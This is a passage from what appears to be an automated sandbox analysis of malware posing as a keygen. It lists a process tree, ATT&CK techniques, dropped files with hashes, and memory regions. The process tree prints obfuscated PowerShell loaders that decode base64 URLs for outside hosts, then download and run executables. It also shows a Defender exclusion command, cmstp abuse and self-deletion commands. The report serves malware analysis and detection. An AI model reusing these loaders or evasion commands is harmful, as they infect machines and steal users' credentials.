                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:1668
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:664
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:1540
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 1540 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\224444815875963\\* & exit
                      9⤵
                        PID:2272
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 1540
                          10⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1928
                • C:\Users\Public\lwz.exe
                  "C:\Users\Public\lwz.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2548
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7E73.tmp\b1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1660
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:572
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            3⤵
            • Delays execution with timeout.exe
            PID:1904
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7E73.tmp\ba.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1988
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1052
              • C:\Users\Public\izw.exe
                "C:\Users\Public\izw.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2460
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2596
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2932
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2932 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\504713524208976\\* & exit
                      8⤵
                        PID:3024
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2932
                          9⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2112
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2656
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:2984
                  • C:\Users\Public\izw.exe
                    "C:\Users\Public\izw.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops desktop.ini file(s)
                    • Modifies system certificate store
                    PID:2700
                    • C:\Users\Admin\AppData\Local\Temp\hfXzVUeubR.exe
                      "C:\Users\Admin\AppData\Local\Temp\hfXzVUeubR.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1456
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                        "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\hfXzVUeubR.exe"'
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2876
                    • C:\Users\Admin\AppData\Local\Temp\1xY83OuVTy.exe
                      "C:\Users\Admin\AppData\Local\Temp\1xY83OuVTy.exe"
                      7⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:1612
                      • C:\Windows\SysWOW64\Notepad.exe
                        "C:\Windows\System32\Notepad.exe"
                        8⤵
                          PID:1832
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c C:\Users\Public\Natso.bat
                            9⤵
                              PID:2244
                          • C:\Program Files (x86)\internet explorer\ieinstal.exe
                            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                            8⤵
                              PID:1116
                          • C:\Users\Admin\AppData\Local\Temp\PdMl92aReg.exe
                            "C:\Users\Admin\AppData\Local\Temp\PdMl92aReg.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:2340
                            • \??\c:\windows\SysWOW64\cmstp.exe
                              "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\dnpey3ne.inf
                              8⤵
                                PID:1256
                            • C:\Users\Admin\AppData\Local\Temp\9e2tsNih0A.exe
                              "C:\Users\Admin\AppData\Local\Temp\9e2tsNih0A.exe"
                              7⤵
                              • Executes dropped EXE
                              • Windows security modification
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1732
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" Get-MpPreference -verbose
                                8⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2584
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\izw.exe"
                              7⤵
                                PID:2572
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /T 10 /NOBREAK
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:1944
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\7E73.tmp\ba1.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:2040
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1876

                  Network

                  MITRE ATT&CK Matrix ATT&CK v6

                  Persistence

                  Modify Existing Service

                  1
                  T1031

                  Registry Run Keys / Startup Folder

                  1
                  T1060

                  Defense Evasion

                  Modify Registry

                  5
                  T1112

                  Disabling Security Tools

                  2
                  T1089

                  Install Root Certificate

                  1
                  T1130

                  Credential Access

                  Credentials in Files

                  3
                  T1081

                  Discovery

                  Query Registry

                  2
                  T1012

                  System Information Discovery

                  2
                  T1082

                  Collection

                  Data from Local System

                  3
                  T1005

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\ProgramData\MSVCP140.dll
                  • C:\ProgramData\freebl3.dll
                  • C:\ProgramData\mozglue.dll
                  • C:\ProgramData\mozglue.dll
                  • C:\ProgramData\msvcp140.dll
                  • C:\ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • C:\ProgramData\softokn3.dll
                  • C:\ProgramData\sqlite3.dll
                  • C:\ProgramData\sqlite3.dll
                  • C:\ProgramData\vcruntime140.dll
                  • C:\ProgramData\vcruntime140.dll
                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4d383b3e-cf5c-43f6-bff5-89adc1fbf433
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_76bcabf6-1a86-48c4-9f46-182ce9b494a1
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8b490668-4fc4-421e-b6c5-58105fb8031c
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e67b47a2-09a2-4f9b-b97c-e8670d7e53c2
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                  • C:\Users\Admin\AppData\Local\Temp\1xY83OuVTy.exe
                    MD5

                    013db621a3351e3fb049efd2ccad79ff

                    SHA1

                    a23394ea54dbc5342a77938a2c285ee616185560

                    SHA256

                    df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                    SHA512

                    1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                  • C:\Users\Admin\AppData\Local\Temp\1xY83OuVTy.exe
                    MD5

                    013db621a3351e3fb049efd2ccad79ff

                    SHA1

                    a23394ea54dbc5342a77938a2c285ee616185560

                    SHA256

                    df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                    SHA512

                    1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                  • C:\Users\Admin\AppData\Local\Temp\7E73.tmp\Keygen.exe
                  • C:\Users\Admin\AppData\Local\Temp\7E73.tmp\Keygen.exe
                  • C:\Users\Admin\AppData\Local\Temp\7E73.tmp\b.hta
                  • C:\Users\Admin\AppData\Local\Temp\7E73.tmp\b1.hta
                  • C:\Users\Admin\AppData\Local\Temp\7E73.tmp\ba.hta
                  • C:\Users\Admin\AppData\Local\Temp\7E73.tmp\ba1.hta
                  • C:\Users\Admin\AppData\Local\Temp\7E73.tmp\m.hta
                  • C:\Users\Admin\AppData\Local\Temp\7E73.tmp\m1.hta
                  • C:\Users\Admin\AppData\Local\Temp\7E73.tmp\start.bat
                  • C:\Users\Admin\AppData\Local\Temp\9e2tsNih0A.exe
                  • C:\Users\Admin\AppData\Local\Temp\9e2tsNih0A.exe
                  • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • C:\Users\Admin\AppData\Local\Temp\PdMl92aReg.exe
                  • C:\Users\Admin\AppData\Local\Temp\PdMl92aReg.exe
                  • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • C:\Users\Admin\AppData\Local\Temp\hfXzVUeubR.exe
                  • C:\Users\Admin\AppData\Local\Temp\hfXzVUeubR.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                  • C:\Users\Public\izw.exe
                  • C:\Users\Public\izw.exe
                  • C:\Users\Public\izw.exe
                  • C:\Users\Public\lwz.exe
                  • C:\Users\Public\lwz.exe
                  • C:\Users\Public\lwz.exe
                  • C:\Users\Public\ofh.exe
                  • C:\Users\Public\ofh.exe
                  • C:\Users\Public\ofh.exe
                  • C:\Windows\temp\dnpey3ne.inf
                  • \??\PIPE\lsarpc
                  • \??\PIPE\srvsvc
                  • \ProgramData\mozglue.dll
                  • \ProgramData\mozglue.dll
                  • \ProgramData\mozglue.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\msvcp140.dll
                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\nss3.dll
                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • \ProgramData\sqlite3.dll
                  • \ProgramData\sqlite3.dll
                  • \ProgramData\sqlite3.dll
                  • \ProgramData\vcruntime140.dll
                  • \ProgramData\vcruntime140.dll
                  • \ProgramData\vcruntime140.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                    MD5

                    02cc7b8ee30056d5912de54f1bdfc219

                    SHA1

                    a6923da95705fb81e368ae48f93d28522ef552fb

                    SHA256

                    1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                    SHA512

                    0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                  • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                  • \Users\Admin\AppData\LocalLow\sqlite3.dll
                  • \Users\Admin\AppData\Local\Temp\1xY83OuVTy.exe
                    MD5

                    013db621a3351e3fb049efd2ccad79ff

                    SHA1

                    a23394ea54dbc5342a77938a2c285ee616185560

                    SHA256

                    df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                    SHA512

                    1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                  • \Users\Admin\AppData\Local\Temp\7E73.tmp\Keygen.exe
                  • \Users\Admin\AppData\Local\Temp\9e2tsNih0A.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  • \Users\Admin\AppData\Local\Temp\PdMl92aReg.exe
                  • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                  • \Users\Admin\AppData\Local\Temp\hfXzVUeubR.exe
                  • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  • \Users\Public\izw.exe
                  • \Users\Public\izw.exe
                  • \Users\Public\lwz.exe
                  • \Users\Public\ofh.exe
                  • \Users\Public\ofh.exe
                  • memory/340-267-0x0000000004CB0000-0x0000000004CB2000-memory.dmp
                    Filesize

                    8KB

                  • memory/340-260-0x0000000000870000-0x00000000008C1000-memory.dmp
                    Filesize

                    324KB

                  • memory/340-231-0x0000000073B80000-0x000000007426E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/340-232-0x0000000000140000-0x0000000000141000-memory.dmp
                    Filesize

                    4KB

                  • memory/340-234-0x0000000000250000-0x0000000000251000-memory.dmp
                    Filesize

                    4KB

                  • memory/340-228-0x0000000000000000-mapping.dmp
                  • memory/368-0-0x0000000000000000-mapping.dmp
                  • memory/572-22-0x0000000072290000-0x000000007297E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/572-20-0x0000000000000000-mapping.dmp
                  • memory/684-195-0x000000000041A684-mapping.dmp
                  • memory/1040-4-0x0000000000000000-mapping.dmp
                  • memory/1040-5-0x0000000000000000-mapping.dmp
                  • memory/1052-54-0x0000000004C60000-0x0000000004C61000-memory.dmp
                    Filesize

                    4KB

                  • memory/1052-30-0x0000000000000000-mapping.dmp
                  • memory/1052-35-0x0000000072290000-0x000000007297E000-memory.dmp
                    Filesize

                    6.9MB

                  • memory/1116-615-0x0000000000190000-0x0000000000191000-memory.dmp
                    Filesize

                    4KB

                  • memory/1116-620-0x0000000000200000-0x0000000000201000-memory.dmp
                    Filesize

                    4KB

                  • memory/1116-618-0x0000000000000000-mapping.dmp
                  • memory/1116-621-0x0000000000000000-mapping.dmp
                  • memory/1116-616-0x0000000000000000-mapping.dmp
                  • memory/1116-614-0x0000000000000000-mapping.dmp
                  • memory/1116-613-0x0000000000110000-0x0000000000111000-memory.dmp
                    Filesize

                    4KB

